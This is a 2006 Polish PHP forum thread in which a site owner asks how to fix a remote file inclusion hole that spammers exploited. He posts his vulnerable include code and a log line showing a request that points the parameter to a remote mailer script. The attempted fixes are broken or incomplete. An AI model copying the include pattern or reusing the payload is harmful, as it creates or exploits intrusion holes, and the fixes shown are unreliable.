Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Zostałem zaatakowany. Hacked & SPAM
Forum PHP.pl > Forum > Przedszkole
admin22
18.12.2006, 18:37:45
Witam.
Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu.

Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku


[PHP] pobierz, plaintext 
  1. <?php
  2. if ($dzial=="" && $str=="")
  3. 				  {
  4. 				   include "serwis/pierwsza.php";
  5. 				   }
  6. 				   else
  7. 				   {
  8. 				   $adres="$dzial"."/"."$str.php";
  9. 					include "$adres";
  10. 					}
  11. ?>
[PHP] pobierz, plaintext


Niestety skrypt został wykorzystany przeciwko mnie:

196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST
/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?
HTTP/1.1" 200 20865
"http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów.

W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania.
Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany.
fiszol
18.12.2006, 18:40:25
Temat: Bezpieczenstwo skryptow php
na 1-szej stronie powyższego tematu masz rozwiązanie.

W ogóle strasznie to napisałeś.
admin22
19.12.2006, 06:04:16
I co może coś innego?? Bo albo czegoś nie mam zainstalowanego, albo żle to robie!!
Pojawia mi się taki komunikat:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279 



[PHP] pobierz, plaintext 
  1. <?php
  2. if ($dzial=="" && $str=="")
  3. 				  {
  4. 				   include "serwis/pierwsza.php";
  5. 				  }
  6. 			   else
  7. 				  {
  8. if(isset($_GET['dzial']))
  9. {  
  10. $page = ereg_replace("://","#",$_GET['dzial']);
  11. }
  12. else
  13. {  
  14.  
  15. $adres="$dzial"."/"."$str.php";
  16. 					include "$adres";
  17. } 
  18.  
  19. 				  }
  20. ?>
[PHP] pobierz, plaintext 


[PHP] pobierz, plaintext 
  1. <?php
  2. przed includem$_GET['plik']=str_replace("/", "#", $_GET['plik']);include $_GET['plik'];dalej....
  3. ?>
[PHP] pobierz, plaintext


Nie wiem jak to zrobić!!

I nie wiem co dalej!!
Co oznacza ten komunikat:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279

Jeżeli coś mam z serwerem że skrypty nie działają to skontaktuje się ze swoim adminem serwera!!
Ktoś wie o co biega??
Pleaasss F1, F1, F1..
nospor
19.12.2006, 08:57:16 
[PHP] pobierz, plaintext 
  1. <?php
  2. $page = ereg_replace("://","#",$_GET['dzial']);
  3. ?>
[PHP] pobierz, plaintext

no ale co to ma byc? nie wiesz, ze jesli dasz \" - to takie cos oznacza ze wstawiasz ". I taki zapis powoduje ze masz niepodomykane ". skladniowo poprawnie powinno byc tak:
[PHP] pobierz, plaintext 
  1. <?php
  2. $page = ereg_replace("://","#",$_GET['dzial']);
  3. ?>
[PHP] pobierz, plaintext

ale czy to bedzie to samo wyrazenie co chciales to juz nie wiem

Cytat
F1, F1, F1..
Daruj sobie. napisz po ludzku "Pomoc". to nie tak ciezko

proszę poprawić tytuł o znacznik zgodnie z zasadami forum Przedszkole:
Temat: Tematyka i zasady panujace na forum Przedszkole
admin22
19.12.2006, 19:14:11
ślicznie dziękuje biggrin.gif smile.gif)
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.